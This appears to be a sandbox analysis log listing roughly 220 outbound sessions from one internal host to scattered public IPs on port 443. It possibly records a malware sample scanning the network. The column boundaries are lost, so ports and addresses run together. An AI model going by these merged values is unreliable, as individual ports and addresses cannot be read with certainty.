                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27660192.168.2.2335720151.30.157.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27661192.168.2.2340514172.174.230.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27662192.168.2.2349384117.173.15.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27663192.168.2.236086293.109.193.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27664192.168.2.235089034.8.19.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27665192.168.2.233900685.36.70.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27666192.168.2.2346618211.176.32.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27667192.168.2.233426893.211.77.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27668192.168.2.2339578170.34.97.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27669192.168.2.2342448223.101.162.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27670192.168.2.233986684.166.241.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27671192.168.2.2349044189.141.253.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27672192.168.2.234867872.60.74.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27673192.168.2.2354308201.5.15.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27674192.168.2.235763848.56.131.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27675192.168.2.2359282219.58.52.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27676192.168.2.235074296.227.92.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27677192.168.2.2348658117.175.226.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27678192.168.2.235510260.57.214.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27679192.168.2.235297072.206.45.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27680192.168.2.233459271.52.154.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27681192.168.2.234611841.44.254.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27682192.168.2.2352200148.230.237.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27683192.168.2.2347880211.176.20.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27684192.168.2.23371048.60.51.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27685192.168.2.2345414164.134.23.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27686192.168.2.2349618138.203.43.91443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27687192.168.2.2351502113.220.35.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27688192.168.2.234015489.126.39.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27689192.168.2.233542684.2.236.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27690192.168.2.2346070106.49.79.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27691192.168.2.2334558213.10.12.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27692192.168.2.2336128147.20.236.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27693192.168.2.235823293.51.44.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27694192.168.2.233455678.244.74.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27695192.168.2.235917482.59.189.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27696192.168.2.235971827.218.97.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27697192.168.2.2340600178.98.115.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27698192.168.2.235685487.151.180.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27699192.168.2.235047475.103.120.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27700192.168.2.2349434216.9.183.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27701192.168.2.2334192125.114.162.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27702192.168.2.2334730146.251.106.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27703192.168.2.2339952183.94.137.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27704192.168.2.2346304209.44.129.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27705192.168.2.2337218171.155.184.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27706192.168.2.2339152115.135.168.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27707192.168.2.234652036.26.247.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27708192.168.2.2353440162.197.150.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27709192.168.2.2358498169.77.113.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27710192.168.2.2333462141.8.153.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27711192.168.2.2345606130.212.56.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27712192.168.2.2344918124.148.24.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27713192.168.2.23568105.176.225.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27714192.168.2.233406818.101.176.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27715192.168.2.2342612184.216.29.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27716192.168.2.236057640.63.91.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27717192.168.2.233602244.130.212.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27718192.168.2.2336588153.127.212.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27719192.168.2.2336468162.201.71.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27720192.168.2.234533825.232.28.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27721192.168.2.23502588.41.181.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27722192.168.2.2350172199.130.88.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27723192.168.2.2351310176.223.105.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27724192.168.2.2346560143.175.20.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27725192.168.2.2338786133.108.63.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27726192.168.2.2334938118.108.37.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27727192.168.2.233602063.42.69.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27728192.168.2.2358490164.203.131.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27729192.168.2.234996632.68.245.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27730192.168.2.2344452144.250.112.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27731192.168.2.2337168199.30.205.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27732192.168.2.2334418212.125.76.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27733192.168.2.2346732169.156.253.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27734192.168.2.2351880220.55.35.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27735192.168.2.234382812.5.228.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27736192.168.2.2336888141.190.8.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27737192.168.2.234602488.59.77.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27738192.168.2.2356704176.167.78.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27739192.168.2.2344044111.73.220.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27740192.168.2.2346766171.70.37.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27741192.168.2.2352844159.63.189.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27742192.168.2.2354462123.56.203.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27743192.168.2.2346636166.198.126.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27744192.168.2.235630496.208.54.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27745192.168.2.2352254155.216.27.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27746192.168.2.2359904202.132.118.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27747192.168.2.2341726164.151.139.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27748192.168.2.2335582179.29.16.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27749192.168.2.2340142180.150.11.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27750192.168.2.233393086.1.241.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27751192.168.2.2345272140.38.46.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27752192.168.2.235543266.223.10.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27753192.168.2.2359718216.125.196.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27754192.168.2.2357870195.37.235.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27755192.168.2.2351530147.167.76.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27756192.168.2.235512266.239.35.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27757192.168.2.23492585.153.23.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27758192.168.2.2349200210.205.93.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27759192.168.2.2348320106.194.157.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27760192.168.2.234407276.89.162.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27761192.168.2.235037288.237.208.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27762192.168.2.2336112108.217.144.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27763192.168.2.235929483.59.172.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27764192.168.2.234794449.1.29.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27765192.168.2.2344234141.18.100.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27766192.168.2.2357496144.61.10.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27767192.168.2.235051845.84.66.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27768192.168.2.23586805.216.197.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27769192.168.2.235316020.172.112.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27770192.168.2.233618217.234.207.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27771192.168.2.234075860.248.188.2208080
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27772192.168.2.233952623.164.143.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27773192.168.2.2342130196.156.149.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27774192.168.2.2342180114.3.195.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27775192.168.2.233714276.190.113.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27776192.168.2.235770686.218.99.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27777192.168.2.2335178155.243.183.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27778192.168.2.234021065.33.55.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27779192.168.2.2360300171.77.191.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27780192.168.2.233587499.11.96.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27781192.168.2.2337354131.113.119.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27782192.168.2.233948046.82.70.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27783192.168.2.235182085.250.170.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27784192.168.2.234460820.62.13.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27785192.168.2.235695640.136.35.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27786192.168.2.233441680.177.16.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27787192.168.2.2342302196.218.236.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27788192.168.2.235597050.70.144.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27789192.168.2.2359732219.197.154.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27790192.168.2.2352418158.51.151.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27791192.168.2.235465867.158.226.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27792192.168.2.2342888194.107.150.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27793192.168.2.2345340216.70.216.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27794192.168.2.2337224204.73.201.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27795192.168.2.234790257.186.222.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27796192.168.2.2354170139.11.78.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27797192.168.2.235825251.152.151.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27798192.168.2.2350202188.118.154.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27799192.168.2.234046895.167.114.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27800192.168.2.236056042.100.56.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27801192.168.2.2347744152.71.147.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27802192.168.2.2360720108.192.238.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27803192.168.2.2350834211.241.152.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27804192.168.2.2359182149.150.20.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27805192.168.2.2339516140.25.163.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27806192.168.2.2351296134.85.43.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27807192.168.2.234752074.194.107.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27808192.168.2.235593825.230.181.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27809192.168.2.2356998172.254.79.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27810192.168.2.233782638.198.154.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27811192.168.2.2341720106.130.127.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27812192.168.2.235770070.168.118.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27813192.168.2.2360336170.134.190.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27814192.168.2.234047089.6.95.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27815192.168.2.2356714119.77.118.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27816192.168.2.23578141.43.175.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27817192.168.2.234213453.94.87.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27818192.168.2.235035625.245.94.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27819192.168.2.2350042117.44.130.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27820192.168.2.233853231.26.98.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27821192.168.2.235364664.94.232.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27822192.168.2.2334066204.47.95.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27823192.168.2.2334268193.144.10.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27824192.168.2.235345440.83.202.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27825192.168.2.2350536204.6.70.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27826192.168.2.235325227.165.213.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27827192.168.2.2353006107.177.215.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27828192.168.2.235404873.94.65.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27829192.168.2.2337188100.145.116.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27830192.168.2.2350788183.187.246.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27831192.168.2.2348530176.30.237.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27832192.168.2.233619827.100.178.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27833192.168.2.2334524138.217.159.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27834192.168.2.2340930121.20.159.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27835192.168.2.2337218119.36.45.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27836192.168.2.233799264.141.103.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27837192.168.2.2348906208.163.75.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27838192.168.2.2350120170.94.147.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27839192.168.2.233949088.195.43.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27840192.168.2.2344836195.97.101.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27841192.168.2.234476687.166.41.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27842192.168.2.2335690111.47.79.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27843192.168.2.235378081.132.34.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27844192.168.2.234023436.125.209.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27845192.168.2.2360828121.45.24.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27846192.168.2.235644496.218.112.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27847192.168.2.233596675.209.220.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27848192.168.2.2347506186.230.25.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27849192.168.2.235892647.46.96.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27850192.168.2.2336994156.174.104.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27851192.168.2.2341394221.87.255.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27852192.168.2.235435287.0.76.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27853192.168.2.2347614130.106.2.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27854192.168.2.235343850.109.207.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27855192.168.2.235996257.96.96.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27856192.168.2.234999876.7.206.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27857192.168.2.234603250.139.69.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27858192.168.2.233669479.85.126.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27859192.168.2.233924234.32.238.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27860192.168.2.2356978196.176.2.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27861192.168.2.2335388205.119.79.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27862192.168.2.2350064172.241.46.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27863192.168.2.2357722160.42.110.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27864192.168.2.235677879.212.115.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27865192.168.2.234952617.48.87.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27866192.168.2.2351718122.110.33.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27867192.168.2.235989642.178.128.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27868192.168.2.2353962155.216.168.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27869192.168.2.234112083.74.197.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27870192.168.2.235713265.178.29.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27871192.168.2.234414053.219.171.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27872192.168.2.235475484.190.110.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27873192.168.2.2355590133.35.127.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27874192.168.2.235399864.51.206.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27875192.168.2.2357202148.185.139.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27876192.168.2.2350814146.249.203.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27877192.168.2.2337264192.88.161.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27878192.168.2.235458468.113.72.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27879192.168.2.233795282.110.186.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27880192.168.2.2353636144.92.75.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            27881192.168.2.2359802101.225.192.31443
